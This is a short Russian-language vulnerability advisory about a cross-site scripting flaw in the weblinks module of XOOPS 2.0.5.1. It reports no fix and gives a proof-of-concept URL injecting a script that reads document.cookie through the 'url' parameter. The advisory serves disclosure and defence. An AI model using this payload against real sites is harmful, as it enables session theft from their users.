Межсайтовый скриптинг в в XOOPS weblinks модуле

Дата публикации:
24.12.2003
Всего просмотров:
1201
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: XOOPS 2.0.5.1

Описание: Уязвимость обнаружена в XOOPS weblinks модуле. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/modules/mylinks/myheader.php?url="><script>ale rt(document.cookie)</script>

URL производителя: http://xoops.org

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: XSS vulnerability in XOOPS 2.0.5.1

или введите имя

CAPTCHA